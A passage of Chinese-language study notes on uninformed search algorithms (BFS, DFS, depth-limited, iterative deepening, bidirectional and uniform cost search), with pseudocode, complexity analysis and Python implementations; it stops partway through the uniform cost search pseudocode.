
第二种建模方式的状态空间要小得多,搜索空间也小得多。

通过搜索对问题求解

基本概念

  1. 搜索树(search tree)

    搜索树是指通过搜索算法,用整个状态空间中的各个状态构建的一棵树。树的根节点是初始状态,树的每个节点都是状态空间中的一个状态。

    搜索树是逐步构建的,不一定会囊括状态空间中的所有状态(有时候根本无法穷举,太多了)

    从初始状态出发,在这个状态下的每个可行动作构成一条边。边的另一边是后继状态。如此持续下去就形成一棵搜索树。

  2. 父节点(parent node)

    父节点是指直接连接到一个或多个子节点的节点。一个父节点可能有多个子节点,但是每个子节点通常只会有一个父节点。在树状结构中,根节点没有父节点。

  3. 子节点(child nodes)

    子节点是从父节点直接派生的节点,通常是下一层或更深层的节点。每个子节点通常都有一个父节点,但它们可能还会有自己的子节点(也就是同时是父节点)。

  4. 叶节点(leaf node)

    叶节点是没有子节点的节点。在树状结构中,叶节点代表最底层的节点,没有进一步的扩展。

    叶节点不一定是终止状态,终止状态意味着无法继续探索(这必然是叶节点),但是叶节点也可以只是还没继续探索(扩展)的状态

  5. 开节点集(frontier, open list)

    开节点集是一组 已发现但尚未被完全探索的节点。在搜索算法中,开节点集包含那些已经被添加到待处理队列(如优先级队列)中的节点,但其相邻节点(后继状态)还没有全部检查过。其表示搜索的前沿部分。

    算法会从这组节点中选取下一个节点来继续搜索。

  6. 闭节点集(closed list, explored set)

    闭节点集表示 已经被完全探索过的节点。这意味着该节点及其所有相邻节点(后继状态)都已经被考虑过(即其已被完全展开,不存在没有展开的后继节点),并且从当前路径来看,没有进一步的探索价值。在搜索中,闭节点集有助于防止重复探索相同的路径。

  7. 搜索策略(search strategy)

    搜索策略是指如何选择节点进行扩展的一套规则。不同的搜索策略会影响算法的效率和结果。

basic_concept

图搜索与树搜索

树搜索 Tree-Search

$$ \begin{array}{l} \text{// \textbf{定义} 树搜索函数,接受一个问题作为输入,返回解决方案或失败} \ \textbf{function} \ \text{TREE-SEARCH}(\text{problem}) \ \text{returns a solution, or failure} \ \quad \text{// 初始化边界(待探索队列),使用问题的初始状态} \ \quad \text{initialize the frontier using the initial state of } \text{problem} \ \quad \text{// 循环开始} \ \quad \text{loop do} \ \quad \quad \text{// 如果边界为空,则返回失败} \ \qquad \text{if the frontier is empty then return failure} \ \quad \quad \text{// 选择一个叶子节点并从边界中移除} \ \qquad \text{choose a leaf node and remove it from the frontier} \ \quad \quad \text{// 如果节点包含目标状态,则返回对应的解决方案} \ \qquad \text{if the node contains a goal state then return the corresponding solution} \ \quad \quad \text{// 扩展所选节点,将结果节点添加到边界} \ \qquad \text{expand the chosen node, adding the resulting nodes to the frontier} \ \end{array} $$

  • 初始化:使用问题的初始状态来初始化边界(frontier)。
  • 循环:通过不断循环来从边界中选择并移除叶节点,如果该节点包含目标状态,则返回对应的解决方案。
  • 扩展节点:如果节点不包含目标状态,则扩展该节点,将结果节点添加到边界中。

图搜索 Graph-Search

$$ \begin{array}{l} \text{// \textbf{定义} 图搜索函数,接受一个问题作为输入,返回解决方案或失败} \ \textbf{function} \ \text{GRAPH-SEARCH}(\text{problem}) \ \text{returns a solution, or failure} \ \quad \text{// 初始化边界(待探索队列),使用问题的初始状态} \ \quad \text{initialize the frontier using the initial state of } \text{problem} \ \quad \text{// 初始化已探索集合为空} \ \quad \textbf{initialize the explored set to be empty} \ \quad \text{// 循环开始} \ \quad \text{loop do} \ \quad \quad \text{// 如果边界为空,则返回失败} \ \qquad \text{if the frontier is empty then return failure} \ \quad \quad \text{// 选择一个叶子节点并从边界中移除} \ \qquad \text{choose a leaf node and remove it from the frontier} \ \quad \quad \text{// 如果节点包含目标状态,则返回对应的解决方案} \ \qquad \text{if the node contains a goal state then return the corresponding solution} \ \quad \quad \text{// 将节点添加到已探索集合} \ \qquad \textbf{add the node to the explored set} \ \quad \quad \text{// 扩展所选节点,将结果节点添加到边界} \ \qquad \text{expand the chosen node, adding the resulting nodes to the frontier} \ \quad \quad \quad \text{// 只有当节点不在边界或已探索集合中时} \ \qquad \quad \textbf{only if not in the frontier or explored set} \ \end{array} $$

  • 初始化:与树搜索类似地初始化边界(frontier),同时初始化一个被探索集合(explored set)为空。
  • 循环:通过不断循环来从边界中选择并移除叶节点,如果该节点包含目标状态,则返回对应的解决方案。
  • 扩展节点:如果节点不包含目标状态,则扩展该节点,也即将结果节点添加到边界中。但是在添加节点到边界之前,会检查节点是否已在边界或被探索集合中。这一步是为了避免重复探索同一节点,防止死循环。

对比:树搜索仅考虑了没有重复状态的简单情况,而图搜索考虑了可能存在重复状态的情况,通过维护一个被探索集合来避免重复工作。

一个直观的例子是,考虑走迷宫。如果迷宫中存在一个环路,如 A -> B -> C -> A,那么:

  • 对于树搜索,它会不断探索 A -> B -> C,然后返回 A,再探索 A -> B -> C,无限循环。
  • 对于图搜索,它会在第一次探索 A -> B -> C 之后,将 A 加入到已探索集合中,下次再探索 A 时,会发现 A 已经被探索过,从而避免重复探索。

简而言之:树搜索是没有记忆的,图搜索有。

搜索算法的效率评价

  • 完备性:如果存在解,能否在有限时间内找到解。注意,存在解暗示了这个解的路径是有限的。
  • 最优性:该算法是否能够找到最优解?
  • 时间复杂度:算法找到解需要花费多长时间?
  • 空间复杂度:算法需要多少内存用于搜索?
    • 树搜索:Frontier
    • 图搜索:Frontier + Explored

问题难度的衡量

图规模 / 图搜索算法的难度

用状态空间图的大小来衡量问题的规模: $|V| + |E|$

  • $V$ 是点数,Vertex
  • $E$ 是边数,Edge

树规模 / 树搜索算法的难度

用树的宽度和深度来衡量问题的规模。

  • 宽度(breadth) / 分支数(branching factor,$b$):树的最大分支数,也即节点所具有的最大子节点数目
  • 深度(depth, $d$) :树的最大深度,也即最浅的目标状态所在

复杂度

  • 时间复杂度 经常用搜索树 展开的节点的数目 表示(通常展开一次对应循环迭代一次,展开越多,耗时越多)
  • 空间复杂度 通常用需要 存储的最大节点数目 来估计

无信息搜索

无信息搜索是指在搜索过程中不使用任何启发信息的搜索方法。无信息搜索方法通常会遍历整个搜索空间,直到找到解或者确定无解。

无信息搜索可以理解为,没有任何的先验知识,就是盲目地去试(尽管盲目地试的时候也可以有些尝试时优先级策略)。

搜索算法的一般存储框架

$$ \begin{array}{l} \textbf{function} \ \text{CHILD-NODE}(problem, parent, action) \ \textbf{returns} \ \text{a node} \ \quad \textbf{return} \ \text{a node with} \ \quad \quad \text{// 创建一个新的节点,其状态是通过在父节点状态上执行给定动作得到的} \ \quad \quad \text{STATE} = problem.\text{RESULT}(parent.\text{STATE}, action), \ \quad \quad \text{// 记录父节点和执行的动作} \ \quad \quad \text{PARENT} = parent, \text{ACTION} = action, \ \quad \quad \text{// 计算新节点的路径代价,即父节点的路径代价加上执行该动作的代价} \ \quad \quad \text{PATH-COST} = parent.\text{PATH-COST} + problem.\text{STEP-COST}(parent.\text{STATE}, action) \end{array} $$

该函数接收一个问题实例 problem,一个父节点 parent,以及一个动作 action,然后返回一个新的节点 node。新节点的属性如下:

  • STATE: 表示节点的状态,是根据父节点的状态和所执行的动作计算得出的,计算方法是 problem.RESULT(parent.STATE, action)
  • PARENT: 指向该节点的父节点。
  • ACTION: 该节点通过执行的动作。
  • PATH-COST: 路径成本,计算方法是累加父节点的路径成本和从父节点状态到当前动作的步骤成本,即 parent.PATH-COST + problem.STEP-COST(parent.STATE, action)

宽度优先搜索 (Breadth First Search, BFS)

宽度优先搜索是一种无信息搜索方法,它从初始状态开始,逐层扩展搜索树,直到找到目标状态。

$$ \begin{array}{l} \textbf{function} \ \text{BREADTH-FIRST-SEARCH}(problem) \ \textbf{returns} \ \text{a solution, or failure} \ \quad \text{// 初始化节点,状态为初始状态,路径代价为0} \ \quad \text{node} \leftarrow \text{a node with STATE} = problem.\text{INITIAL-STATE, PATH-COST} = 0 \ \quad \text{// 检查初始节点是否为目标状态} \ \quad \textbf{if} \ problem.\text{GOAL-TEST}(node.\text{STATE}) \ \textbf{then return} \ \text{SOLUTION}(node) \ \quad \text{// 初始化frontier为仅包含初始节点的FIFO队列} \ \quad \text{frontier} \leftarrow \text{a FIFO queue with node as the only element} \ \quad \text{// 初始化explored为空集} \ \quad \text{explored} \leftarrow \text{an empty set} \ \quad \textbf{loop do} \ \quad \quad \text{// 如果frontier为空,返回失败} \ \quad \quad \textbf{if} \ \text{EMPTY}(frontier) \ \textbf{then return} \ \text{failure} \ \quad \quad \text{// 从frontier中取出最浅的节点,这一步对应宽度优先的思想,也是各个算法最不同的地方} \ \quad \quad \text{node} \leftarrow \text{POP}(frontier) \ \quad \quad \text{// 将节点状态添加到explored中} \ \quad \quad \text{add} \ \text{node.STATE to explored} \ \quad \quad \text{// 对每个可能的动作生成子节点} \ \quad \quad \textbf{for each} \ \text{action in problem.}\text{ACTIONS}(node.\text{STATE}) \ \textbf{do} \ \quad \quad \quad \text{child} \leftarrow \text{CHILD-NODE}(problem, node, action) \ \quad \quad \quad \text{// 如果子节点状态不在explored和frontier中} \ \quad \quad \quad \textbf{if} \ \text{child.STATE is not in explored or frontier then} \ \quad \quad \quad \quad \text{// 如果子节点为目标状态,返回解} \ \quad \quad \quad \quad \textbf{if} \ \text{problem.GOAL-TEST}(child.\text{STATE}) \ \textbf{then return} \ \text{SOLUTION}(child) \ \quad \quad \quad \quad \text{// 将子节点插入frontier} \ \quad \quad \quad \quad \text{frontier} \leftarrow \text{INSERT}(child, frontier) \end{array} $$

时间复杂度与空间复杂度

  • 时间复杂度:考虑到每个节点都被处理一次,而且 BFS 会一直搜索到最浅的解。在最坏情况下,目标状态在最后一个展开的节点处。因此宽度优先搜索的时间复杂度(需要展开的节点数)为

    $$ b + b^2 + b^3 + \ldots + b^d = O(b^d) $$

    其中 $b$ 是分支因子(每个节点的平均分支数),$d$ 是搜索深度(最浅的目标状态所在)。

  • 空间复杂度:宽度优先搜索的空间复杂度为 $O(b^d)$​​[^1]。

    在深度 $d$ 处,每一层最多有 $b^d$ 个节点,因而:

    1. 树搜索:需要存储开节点集 Frontier,对于 BFS 来说就是当前层和下一层的所有节点,空间复杂度也是

      $$ b^{d-1} + b^d =O(b^d) $$

    2. 图搜索:除了需要存储开节点集 Frontier,还要存储所有访问过的节点 Explored 以避免重复访问,空间复杂度是

      $$ [b^{d-1} + b^d]+[b + b^2 + b^3 + \ldots + b^d] = O(b^d) $$

算法实现

开节点集(frontier):队列(queue)

回忆一下,什么是开节点集?开节点集是指已发现但尚未被处理的节点。在搜索算法中,开节点集表示搜索的前沿部分。算法通过从这组节点中选取下一个节点来继续搜索。

宽度优先搜索使用 队列(queue) 数据结构,遵循 先进先出(FIFO) 的原则(也即每次弹出最先进入队列的元素),以确保最先访问的节点的邻居(邻居指与某个节点直接相连的节点)将最先扩展。

优点

  1. 路径最短保证:宽度优先搜索能够保证在无权图中找到从起点到终点的最短路径。

  2. 完备性:如果有解,BFS 保证能找到解。

    因为 BFS 是逐层搜索的,假设解的路径长度为 $d$,那么无论如何,BFS 的最大搜索空间也就是 $O(b^d)$ ,因此 BFS 一定会在第 $d$​​ 层找到解。

from queue import Queue

q = Queue(maxsize = 3)

print(q.qsize()) # 0
print(q.full())
print(q.empty())
q.put('a')
q.put('b')
q.put('c')
print(q.qsize()) # 3
print(q.get()) # a
闭节点集(explored set):哈希表(hash table)

闭节点集表示已经被处理和扩展过的节点。在搜索中,闭节点集有助于防止重复探索相同的路径。

宽度优先搜索使用 哈希表(hash table) 数据结构来存储已经访问过的节点,以避免重复访问。

不同于使用 for 时间复杂度尾 $O(n)$ 的循环遍历,哈希表可以在 $O(1)$ 的时间复杂度下检查一个节点是否已经被访问过。

哈希表的原理:哈希表是一种数据结构,它通过 哈希函数 将键映射到表中的一个位置来访问记录。哈希表的查找、插入和删除操作的时间复杂度都是 $O(1)$​。

可以想到,对于一个大范围向低范围的映射,一定是非单射的,也即存在哈希冲突的问题(多个键映射到一个值),但是哈希表可以采用诸如开放地址法、链地址法等扩展这个表。在此就不再展开了。

explored = set()
explored.add('a')
explored.add('b')
print('a' in explored) # True
宽度优先搜索实现
from copy import deepcopy
from queue import Queue
from interface.state import StateBase
from utils.show_path import show_reversed_path

# 定义宽度优先搜索类
class BreadthFirstSearch:
    # 初始化函数,接受一个状态对象,并验证其为StateBase的实例
    def __init__(self, state: StateBase):
        assert isinstance(state, StateBase)
        self.initial_state = deepcopy(state)  # 使用深拷贝以避免修改原始状态

    # 搜索函数,tree_search控制是否使用树搜索,require_path控制是否返回路径
    def search(self, tree_search: bool=True, require_path: bool=True) -> None:
        states_queue = Queue()  # 状态队列,用于存储待探索的状态
        explored_states = set()  # 探索过的状态集合,防止重复探索,图搜索专用
        last_state_of = dict()   # 记录每个状态的前一个状态,用于输出整体路径时路径回溯

        # 将初始状态加入队列和探索集合
        states_queue.put(self.initial_state)
        explored_states.add(self.initial_state)

        # 当队列非空时,持续处理
        while not states_queue.empty():
            state = states_queue.get()  # 从队列中获取一个状态

            # 如果状态成功,则根据是否需要路径显示不同的信息
            if state.success():
                if require_path:
                    show_reversed_path(last_state_of, state)  # 显示从初始状态到当前状态的路径
                else:
                    state.show()  # 显示当前状态
                continue

            # 如果状态失败,继续下一个循环
            if state.fail():
                continue

            # 对当前状态可采取的每个动作进行遍历,这里最外层使用 for 循环保证了广度优先(优先遍历同一层)
            for action in state.action_space():
                new_state = state.next(action)  # 生成新的状态

                # 如果使用树搜索或新状态未被探索过,进行处理
                if tree_search:
                    states_queue.put(new_state)  # 将新状态加入队列,但不会立刻遍历,因为先要从 for 循环中取出当前节点的所有动作
                    if require_path:
                        last_state_of[new_state] = state  # 记录路径

                # 如果使用图搜索,额外要求新状态未被探索过
                elif new_state not in explored_states:
                    states_queue.put(new_state)  # 将新状态加入队列
                    explored_states.add(new_state)  # 添加到已探索集合
                    if require_path:
                        last_state_of[new_state] = state  # 记录路径

这里的 state.success()state.fail()StateBase 类的两个方法,用于判断当前状态是否为目标状态或失败状态。

  • 目标状态:代表搜索成功,找到了解。
  • 失败状态:代表搜索失败,无法找到解。

可以看到,与树搜索不同,图搜索需要额外的探索集合 explored_states 来避免重复探索。

深度优先搜索 (Depth First Search, DFS)

深度优先搜索也是一种无信息搜索方法,它从初始状态开始,沿着搜索树的深度方向 进行搜索,直到找到目标状态或者无法继续搜索。当无法继续搜索时,回溯到上一个节点,继续搜索。

相较于 BFS 的实现,将 FIFO 队列替换为 LIFO 栈即可实现 DFS。此外,DFS 还可以使用递归来实现。

时间复杂度与空间复杂度

  • 时间复杂度:在最坏情况下,DFS 可能会遍历所有可能的节点直到最大搜索深度 $m$。假设每个节点平均有 $b$ 个分支,那么在深度 $m$ 时,可能会有 $b^m$ 个节点需要被访问。因此,DFS 的时间复杂度是 $O(b^m)$。

  • 空间复杂度:DFS 使用的是递归或栈来实现。在最坏情况下,DFS 需要存储从根节点到最大搜索深度 $m$ 的路径上的所有节点,对于这条路径上的 $m$ 个节点中的每一个,需要存储 $b$ 个分支节点。因此,DFS 的空间复杂度是 $O(bm)$。

    由此可见,DFS 的空间复杂度比 BFS 小得多,因为它不需要存储浅于当前深度的所有节点,而只是存了从根节点到当前节点这条路径上的所有节点。所以,如果内存受限,深度优先可以搜得更深。

    当然,如果搜索树的深度很大,那么 DFS 的空间复杂度也会很大。

算法实现

开节点集(frontier):栈(stack)

深度优先搜索使用 栈(stack) 数据结构,后进先出(LIFO) 的原则(也即每次弹出最后进入栈的元素),以确保最后访问的节点的邻居将最先扩展。

优点

  1. 空间效率:深度优先搜索的空间复杂度比宽度优先搜索要小,因为它不需要存储浅于当前深度的所有节点。

  2. 完备性DFS 是不完备的

    因为在 无限状态空间 的情况下,即使有解,DFS 也可能会在没有解的分支中无限下探($m = +\infin$,但是 $d_{ans}$​ 是有限数)。不过,对于有限状态空间,DFS 是完备的 (有限状态空间下,只要用图搜索,不重复搜,应该都是完备的)

from queue import LifoQueue
s = LifoQueue(maxsize = 3)
print(s.qsize()) # 0
print(s.full())
print(s.empty())
s.put('a')
s.put('b')
s.put('c')
print(s.qsize()) # 3
print(s.get()) # c
深度优先搜索实现
from copy import deepcopy
from queue import LifoQueue

from interface import StateBase
from utils.show_path import show_reversed_path

class DepthFirstSearch:
    # 初始化函数,接受一个状态对象,并验证其为StateBase的实例
    def __init__(self, state: StateBase):
        assert isinstance(state, StateBase)
        self.initial_state = deepcopy(state)

    def search(self, tree_search: bool=True, require_path: bool=True) -> None:
        states_stack = LifoQueue()
        explored_states = set()

        # 将初始状态放入栈中,并记录状态为已探索
        # 注意这里存储一个元组,而不是 BFS 的仅存储状态,因为我们要存储当前搜索路径上每个节点的所有下一步可能
        # 也即空间复杂度 O(mb) 中的 b
        states_stack.put((self.initial_state, 0))
        explored_states.add(self.initial_state)

        last_state_of = {}

        # 这里没有 BFS 内层的 for 循环,直接对整个状态栈遍历
        while not states_stack.empty():
            state, action_id = states_stack.get()

            if state.success():
                if require_path:
                    # 如果成功达到目标状态,且需要路径,展示从初始状态到当前状态的路径
                    show_reversed_path(last_state_of, state)
                else:
                    # 否则只展示当前状态
                    state.show()
                continue

            if state.fail():
                continue  # 如果状态失败,跳过当前循环

            if action_id < len(state.action_space()):
                # 即将遍历子节点,将当前状态压栈,action_id 记录对于当前状态已经充分探索过的节点个数
                # 结束对于一个节点的搜索当且仅当所有子节点都被遍历过,也即 action_id == len(state.action_space())
                states_stack.put((state, action_id + 1))

                # 探索当前状态下,允许的新状态 state.action_space()[action_id]
                new_state = state.next(state.action_space()[action_id])
                # 如果是树搜索,将新状态放入栈中
                if tree_search:
                    # 这句话结合外层的 while 循环保证了会一直尝试深度优先
                    states_stack.put((new_state, 0))
                    if require_path:
                        # 记录下一个状态的前驱状态为当前状态
                        last_state_of[new_state] = state
                # 如果是图搜索,额外要求新状态未被探索过,才能将新状态放入栈中
                elif new_state not in explored_states:
                    states_stack.put((new_state, 0))
                    explored_states.add(new_state)
                    if require_path:
                        last_state_of[new_state] = state

BFS vs DFS

  • Complete(完备性):指算法是否保证在有解的情况下找到解。
  • Time(时间复杂度):算法执行所需时间的估计,用大 $O$ 表示法表示。
  • Space(空间复杂度):算法在执行过程中所需存储空间的估计。
  • Optimal(最优性):算法是否能保证找到最优解。

参数

  • $b$:表示树的分支因子,即每个节点平均的子节点数。
  • $d$:表示目标节点(解)在树中的深度。
  • $m$:表示搜索树的最大深度。

算法比较

  • 宽度优先搜索(Breadth-First)
    • 完备性:是,如果有解,宽度优先搜索总能找到。
    • 时间复杂度:$O(b^d)$,因为每一层的节点都要被访问。
    • 空间复杂度:$O(b^d)$,因为需要存储在内存中的节点数与树的宽度成正比。
    • 最优性:是,因为它是按层搜索,所以首次到达的解通常是最短的。
  • 深度优先搜索(Depth-First)
    • 完备性:否,可能会在没有解的分支中无限下探。
    • 时间复杂度:$O(b^m)$,最坏情况下需要探索到最深的叶子节点。
    • 空间复杂度:$O(bm)$,只需要存储单一路径上的节点加上每个节点的子节点。
    • 最优性:否,因为它可能首先找到的解不是最短的解,例如在下图中,因为先展开 B,于是找到一个 $d = 2$ 的解,尽管 $d_{best} = 1$
graph TD
    A(Start)
    A --> B
    B -->|d=2| Solution1
    A -->|d_best=1| Solution2

总结:

  • 宽度优先搜索在找到 最短路径 的问题上很有优势
  • 深度优先搜索在 空间效率 上较高,但可能不会找到最优解。
  • 宽度优先搜索的时间复杂度和 最大深度 成指数关系
  • 深度优先搜索的时间复杂度和 最长路径 成指数关系

深度受限搜索

在树搜索的深度优先搜索中,由于没有存储搜索过的节点,可能会导致搜索陷入死循环(注意,树搜索是没有记忆探索过节点 Explored 的搜索,而不是对树的搜索,对树的搜索是不会陷入死循环的,因为其中没有环路,但是对图的树搜索,可以沿着一个环搜回来)。于是,深度受限搜索应运而生。

深度受限搜索(Depth-Limited Search)是一种树搜索策略,它在深度优先搜索的基础上引入了 深度限制,以防止陷入无限循环。

深度受限搜索通过限制搜索的最大深度 $L$,将深度为 $L$​​ 的节点视为没有后继的叶子节点,从而解决了无限循环的问题。

性质

  • 搜索完备性: 当深度限制 $L$ 小于问题的解的深度 $d$ 时,搜索可能是不完全的,即可能无法找到解。因为即使是最浅的解,它的深度也超过了限制。选择 $L>d$ 可以增加完备性。
  • 搜索最优性:类似 DFS,深度首先搜索返回的解不是最优解,不具有最优性

复杂度分析

  • 时间复杂度: $O(b^L)$,其中 $b$ 是分支因子, $L$ 是限制的最大搜索深度
  • 空间复杂度: $O(bL)$​

延伸

  • 特殊情况: 深度优先搜索可以看作是 $L=\infty$ 的深度受限搜索。
  • 搜索结果: 深度受限搜索可能有两种搜索不成功的情况:
    • 真的 “没有解”
    • 由于没有搜索到足够深度而错误地返回 “无解”。

深度受限搜索提供了一种在深度优先搜索基础上引入深度限制的策略,以平衡搜索的完备性和效率。

伪代码

$$ \begin{array}{l} \textbf{function} \ \text{DEPTH-LIMITED-SEARCH}(problem, limit) \ \textbf{returns} \ \text{a solution, or failure/cutoff} \ \quad \text{// 调用递归深度受限搜索} \ \quad \textbf{return} \ \text{RECURSIVE-DLS}(\text{MAKE-NODE}(problem.\text{INITIAL-STATE}), problem, limit) \ \ \textbf{function} \ \text{RECURSIVE-DLS}(node, problem, limit) \ \textbf{returns} \ \text{a solution, or failure/cutoff} \ \quad \text{// 检查当前节点是否为目标状态} \ \quad \textbf{if} \ problem.\text{GOAL-TEST}(node.\text{STATE}) \ \textbf{then return} \ \text{SOLUTION}(node) \ \quad \text{// 检查深度限制是否为0} \ \quad \textbf{else if} \ limit = 0 \ \textbf{then return} \ \text{cutoff} \ \quad \textbf{else} \ \quad \quad \text{// 初始化截断标志} \ \quad \quad \text{cutoff-occurred?} \leftarrow \text{false} \ \quad \quad \text{// 对每个可能的动作生成子节点} \ \quad \quad \textbf{for each} \ \text{action in problem.}\text{ACTIONS}(node.\text{STATE}) \ \textbf{do} \ \quad \quad \quad \text{// 生成子节点} \ \quad \quad \quad \text{child} \leftarrow \text{CHILD-NODE}(problem, node, action) \ \quad \quad \quad \text{// 递归调用递归深度受限搜索,设定最大搜素深度-1} \ \quad \quad \quad \text{result} \leftarrow \text{RECURSIVE-DLS}(child, problem, limit - 1) \ \quad \quad \quad \text{// 检查结果是否为截断} \ \quad \quad \quad \textbf{if} \ \text{result = cutoff} \ \textbf{then} \ \text{cutoff-occurred?} \leftarrow \text{true} \ \quad \quad \quad \text{// 如果结果不是失败,返回结果} \ \quad \quad \quad \textbf{else if} \ \text{result} \neq \ \text{failure} \ \textbf{then return} \ \text{result} \ \quad \quad \text{// 如果发生截断,返回截断,否则返回失败} \ \quad \textbf{if} \ \text{cutoff-occurred?} \ \textbf{then return} \ \text{cutoff} \ \textbf{else return} \ \text{failure} \ \end{array} $$

迭代加深搜索

深度受限搜索固然避免了无限循环,但是带来了一个新的问题就是我们需要手动设置最大深度 $L$,这会造成麻烦,因为我们不太好确定设定多大是最好的,于是,迭代加深搜索应运而生。

迭代加深搜索(Iterative Deepening Search, IDS)是一种结合了深度优先搜索和深度受限搜索的搜索策略,它通过 逐渐增加深度限制 来提高搜索的完备性和效率。

算法过程

迭代加深搜索每次都从根节点重新开始。它先探索较浅的节点,然后逐渐深入到更深的层次。

  1. 设定深度限制 $d = 0$。
  2. 进行深度优先搜索,但搜索的深度不超过 $d$。
  3. 完成对当前深度的搜索后,增加深度限制 $d = d + 1$。
  4. 重复步骤 2 和 3,直到找到目标节点或达到问题的最大深度。

复杂度分析

  • 空间复杂度:由于它每次都使用深度优先搜索(DFS),所以空间复杂度保持在 $O(bd)$,其中 $b$ 是分支因子, $d$ 是深度限制。因为它和深度优先搜索一样,只需要存储单一路径上的节点(以及各节点的一级子节点),而不需要像 BFS 那样存储所有的节点,而且因为限制了深度,所以不会像 DFS 陷入无限循环。

  • 时间复杂度

    如果当前的深度限制为 $d$ ,那么对于迭代加深搜索来说,它过往已经尝试了 $0\sim d-1$ 的深度限制,所以其时间复杂度为:

    $$ O(b^0 + b^1 + b^2 + \ldots + b^{d-1} + b^d) = O(b^{d}) $$

    可以看出,迭代加深搜索的时间复杂度与深度优先搜索相同。

简而言之,迭代加深算法用深度优先的所需空间,按广度优先的时间完成了任务。

  • 深度优先的所需空间:每次都相当于一个深度受限搜索
  • 广度优先的时间:深度限制迭代到解的深度就停了,不会往更深了搜(但是纯 DFS 有可能因为现在的路径不对,搜了一条别的路径,搜的比最优解深)

伪代码

$$ \begin{array}{l} \textbf{function} \ \text{ITERATIVE-DEEPENING-SEARCH}(problem) \ \textbf{returns} \ \text{a solution, or failure} \ \quad \text{// 从深度0开始,不断增加搜索深度} \ \quad \textbf{for} \ depth = 0 \ \textbf{to} \ \infty \ \textbf{do} \ \quad \quad \text{// 调用深度受限搜索} \ \quad \quad \text{result} \leftarrow \text{DEPTH-LIMITED-SEARCH}(problem, depth) \ \quad \quad \text{// 如果结果不是截断,返回结果} \ \quad \quad \textbf{if} \ result \neq \ \text{cutoff} \ \textbf{then return} \ result \ \end{array} $$

双向搜索

双向搜索(Bidirectional Search)是一种更取巧搜索策略,它 同时从初始状态和目标状态开始搜索,直到两个搜索路径相遇。双向搜索通常用于图搜索,以减少搜索空间,提高搜索效率。

  • 时间复杂度:双向搜索的时间复杂度为 $O(b^{d/2})$,其中 $b$ 是分支因子,$d$ 是目标节点的深度。双向搜索的时间复杂度比单向搜索低得多,因为它同时从两个方向搜索,而不是从一个方向搜索
  • 空间复杂度:双向搜索的空间复杂度也为 $O(b^{d/2})$

可以看做是 两个深度为原先一半的宽度优先搜索,因此时间复杂度和空间复杂度都是 $O(b^{d/2})$。

总结

宽度优先:

  • 往往采用 图搜索 实现,需要 存储所有开节点 Frontier 与闭节点 Explored
    • 开节点:已发现但还未被完全探索的节点
    • 闭节点:已经被完全探索过的节点
  • 需要的内存随着层数 $d$ 加深而指数增长
  • 因为是一层层地搜索,所以保证找到的是最优解
  • 开节点弹出用 先进先出 FIFO 的数据结构 队列 实现

深度优先:

  • 往往采用 树搜索 实现,只存开节点 Frontier
  • 需要内存随着搜索 $m$ 深度线性增加
  • 某些问题下有可能进入死循环,不能保证找到的是最优解。
  • 如果用图搜索实现深度优先,那么它的空间复杂度的优势就没了(也存 Explored 了)。
  • 开节点弹出用 后进先出 LIFO 的数据结构 实现

一致代价搜索 (Uniform Cost Search, UCS)

回忆我们之前讲的,各个无信息搜索算法其实差别就在于如何从开节点集中选择下一个节点来探索,那么除了单纯的依据添加顺序,选择最早的(对应 BFS)或者最晚的(对应 DFS)外,当然也可以有其他的选择方式。

同时,我们对原有的问题进行推广后会发现,BFS 当且仅当每一步的花费相同时,才会因为选择最早添加的节点扩展,满足了步数(深度)最小,从而获得最优性。

但是当每一步的花费不同时,BFS 就不在拥有最优性了。很自然地,我们想到此时可以根据路径成本排序,而这,就是一致代价搜索。

一致代价搜索是一种无信息搜索方法,它通过维护一个按从起点到当前点 $n$ 的路径成本 $g(n)$ 排序的边界(frontier)来搜索最小成本路径。一致代价搜索的特点是 每次都选择当前成本最小的节点进行扩展

  • 开节点集:优先队列 (priority queue),按路径成本 $g(n)$​ 排序,当发现一条更优路径时更改开节点集的信息(也即,如果发现了一条比之前更短的路径到达某个节点,就需要更新该节点在开节点集中的信息,以确保在后续的搜索中能够优先考虑这条更短的路径)

    BFS 可以看每一步的成本都相同的 UCS 特例。

  • 闭节点集:哈希表(hash table),存储已探索过的节点。

对于优先队列的弹出,要求当某一节点 $p$ 出队时,队列中任意节点 $n$ 的 $g(n)$ 已经没有比它更小的了,由于路径成本是累积的,所以对以后弹出的任何节点 $q$,都会有 $g(q) + g(q\to p) \geq g(q) \geq g(p)$,这保证了以后弹出的任何节点,再到 $p$​,路径都不会更短了。

性质分析

把一致代价搜索理解为问题推广到单步成本不同的情况后的 BFS,很自然的可以证明其同时拥有 完备性与最优性

时空复杂度分析

UCS 的时间复杂度和空间复杂度在最坏情况下均为 $O(b^{1 + \lfloor C^* / \epsilon \rfloor})$。这里的 $C^*$ 表示到达目标状态的最小总花费,而 $\epsilon$ 是任何一步可能的最小花费。

  • 分支因子 $b$:在搜索树中,每个节点的子节点数即为分支因子。
  • 最大深度:以最小花费 $\epsilon$ 计算,直到累计花费达到 $C^$,最大深度为 $1 + \lfloor C^ / \epsilon \rfloor$。

一致代价搜索对解路径的步数并不关心,只关心路径总代价。

其可以看做将 BFS 的先入先出 FIFO 队列改为了 按照路径成本排序的优先队列。最极端情况下,每一步的成本等同为 $\epsilon$ ,此时它的时间、空间复杂度的上界均可以看做一个最大深度 $d = 1 + \lfloor C^* / \epsilon \rfloor$ 的 BFS。因而可以立刻得出,其时间、空间复杂度均为 $O(b^{1 + \lfloor C^* / \epsilon \rfloor})$​​​。

伪代码

$$ \begin{array}{l} \textbf{function} \ \text{UNIFORM-COST-SEARCH}(problem) \ \textbf{returns} \ \text{a solution, or failure} \ \quad \text{// 初始化节点,状态为初始状态,路径代价为0} \ \quad \text{node} \leftarrow \text{a node with STATE} = problem.\text{INITIAL-STATE, PATH-COST} = 0 \ \quad \text{// 初始化优先队列frontier,按路径代价排序,仅包含初始节点} \ \quad \text{frontier} \leftarrow \text{a priority queue ordered by PATH-COST, with node as the only element} \ \quad \text{// 初始化explored为空集} \ \quad \text{explored} \leftarrow \text{an empty set} \ \quad \textbf{loop do} \ \quad \quad \text{// 如果frontier为空,返回失败} \ \quad \quad \textbf{if} \ \text{EMPTY}?(frontier) \ \textbf{then return} \ \text{failure} \ \quad \quad \textbf{// 从frontier中取出路径代价最小的节点,这是最关键的一步} \ \quad \quad \text{node} \leftarrow \text{POP}(frontier) \ \quad \quad \text{// 检查节点是否为目标状态} \ \quad \quad \textbf{if} \ problem.\text{GOAL-TEST}(node.\text{STATE}) \ \textbf{then return} \ \text{SOLUTION}(node) \ \quad \quad \text{// 将节点状态添加到explored中} \ \quad \quad \text{add} \ \text{node.STATE to explored} \ \quad \quad 